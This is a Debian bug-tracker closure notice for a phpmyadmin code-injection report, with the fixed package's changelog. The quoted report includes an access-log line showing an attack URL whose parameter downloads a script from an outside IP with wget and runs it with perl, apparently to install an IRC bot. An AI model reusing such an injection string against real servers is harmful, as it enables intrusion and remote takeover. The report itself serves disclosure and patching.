Your message dated Sun, 25 Oct 2009 19:57:50 +0000
with message-id <e1n29dq-0001vw...@ries.debian.org>
and subject line Bug#543460: fixed in phpmyadmin 4:2.9.1.1-13
has caused the Debian Bug report #543460,
regarding phpmyadmin: PHPMyAdmin seems to be vulnerable to some code injection
to be marked as done.
This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.
(NB: If you are a system administrator and have no idea what this
message is talking about, this may indicate a serious mail system
misconfiguration somewhere. Please contact ow...@bugs.debian.org
immediately.)
--
543460: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=543460
Debian Bug Tracking System
Contact ow...@bugs.debian.org with problems
--- Begin Message ---
Package: phpmyadmin
Version: 4:2.11.8.1-5+lenny1
Severity: critical
Tags: security
Justification: root security hole
Hi,
After looking at my logs, I did notice a lot of attempts to break in
phpmyadmin through the following kind of url:
82.79.155.33 - - [29/Jun/2009:03:32:31 +0200] "GET
//phpmyadmin//config.inc.php?c=wget%20http://188.24.50.187/50.txt%20-O%20/tmp/50.txt;perl%20/tmp/50.txt%20%3E%3E/dev/null&
It seems PHPMyAdmin shipped with Lenny is still vulnerable to this
remote exploit
It is basically an IRC bot
-- System Information:
Debian Release: 5.0.2
APT prefers stable
APT policy: (500, 'stable')
Architecture: amd64 (x86_64)
Kernel: Linux 2.6.28.6-p390-20090217 (SMP w/4 CPU cores)
Locale: lang=fr...@euro, lc_ctype=fr...@euro (charmap=ISO-8859-15)
Shell: /bin/sh linked to /bin/bash
Versions of packages phpmyadmin depends on:
ii debconf [debconf-2 1.5.24 Debian configuration management sy
ii libapache2-mod-php 5.2.6.dfsg.1-1+lenny3 server-side, HTML-embedded scripti
ii perl 5.10.0-19 Larry Wall's Practical Extraction
ii php5 5.2.6.dfsg.1-1+lenny3 server-side, HTML-embedded scripti
ii php5-cgi 5.2.6.dfsg.1-1+lenny3 server-side, HTML-embedded scripti
ii php5-mcrypt 5.2.6.dfsg.1-1+lenny3 MCrypt module for php5
ii php5-mysql 5.2.6.dfsg.1-1+lenny3 MySQL module for php5
Versions of packages phpmyadmin recommends:
ii apache2 2.2.9-10+lenny3 Apache HTTP Server metapackage
ii apache2-mpm-prefor 2.2.9-10+lenny3 Apache HTTP Server - traditional n
ii php5-gd 5.2.6.dfsg.1-1+lenny3 GD module for php5
Versions of packages phpmyadmin suggests:
ii mysql-server-5.0 [mysq 5.0.51a-24+lenny1 MySQL database server binaries
-- debconf information:
phpmyadmin/setup-username: admin
* phpmyadmin/reconfigure-webserver:
phpmyadmin/restart-webserver: false
--- End Message ---
--- Begin Message ---
Source: phpmyadmin
Source-Version: 4:2.9.1.1-13
We believe that the bug you reported is fixed in the latest version of
phpmyadmin, which is due to be installed in the Debian FTP archive:
phpmyadmin_2.9.1.1-13.diff.gz
to pool/main/p/phpmyadmin/phpmyadmin_2.9.1.1-13.diff.gz
phpmyadmin_2.9.1.1-13.dsc
to pool/main/p/phpmyadmin/phpmyadmin_2.9.1.1-13.dsc
phpmyadmin_2.9.1.1-13_all.deb
to pool/main/p/phpmyadmin/phpmyadmin_2.9.1.1-13_all.deb
A summary of the changes between this version and the previous one is
attached.
Thank you for reporting the bug, which will now be closed. If you
have further comments please address them to 543...@bugs.debian.org,
and the maintainer will reopen the bug report if appropriate.
Debian distribution maintenance software
pp.
Thijs Kinkhorst <th...@debian.org> (supplier of updated phpmyadmin package)
(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing ftpmas...@debian.org)
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
Format: 1.7
Date: Sun, 25 Oct 2009 12:25:47 +0100
Source: phpmyadmin
Binary: phpmyadmin
Architecture: source all
Version: 4:2.9.1.1-13
Distribution: oldstable-security
Urgency: high
Maintainer: Thijs Kinkhorst <th...@debian.org>
Changed-By: Thijs Kinkhorst <th...@debian.org>
Description:
phpmyadmin - Administrate MySQL over the WWW
Closes: 535044 543460 552194
Changes:
phpmyadmin (4:2.9.1.1-13) oldstable-security; urgency=low
.
* Fix inverted logic in documentation of new script.
.
phpmyadmin (4:2.9.1.1-12) oldstable-security; urgency=high
.
* Upload to oldstable to fix security issues.
* Cross site scripting (CVE-2009-3696, closes: #552194).
* Allow saving of configuration from setup script only after
explicit action from administrator (closes: #535044, #543460).
Files:
0a8c412c5481b2260562ab5649c70d8b 1021 web extra phpmyadmin_2.9.1.1-13.dsc
68fc6b7269343482b96326553dd1e0c0 57060 web extra phpmyadmin_2.9.1.1-13.diff.gz
85eaa36525db64fdd0ba9955c9def399 3605314 web extra
phpmyadmin_2.9.1.1-13_all.deb
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.9 (GNU/Linux)
iQEcBAEBAgAGBQJK5DbCAAoJECIIoQCMVaAcnqQIAJYA79w/IdQftDzenAXzRv41
YGmyo3SA0X3e76VeLdUstXJa+JvT5uKZNRVx3sh9s+HfIdETKKhNb1pkdla/RmZ1
X55bYpF8HIavS2tJcRaCn9E5txJs5epgz0bd2Mg1uhp3Y07EnbCAR19VG7nqIj87
HPT3CU/i5Y/0GO+JrWPt6Mh59TySEXzCHnDuSpPZUBMWxS5RgyQ7qjIu6HaStixv
IhMl1h4PKD05bwJ2fszHfbXEcP1wW+rQSslWjk3jJyuIGzJ7ES7lhSk6NGzAY8GV
2gUOOoq8aqWRbM1lU8sK+Qfj9lAyKhb1SdGBDky+MnEukId2ANwKZX082J+X/+M=
=DeBv
-----END PGP SIGNATURE-----
--- End Message ---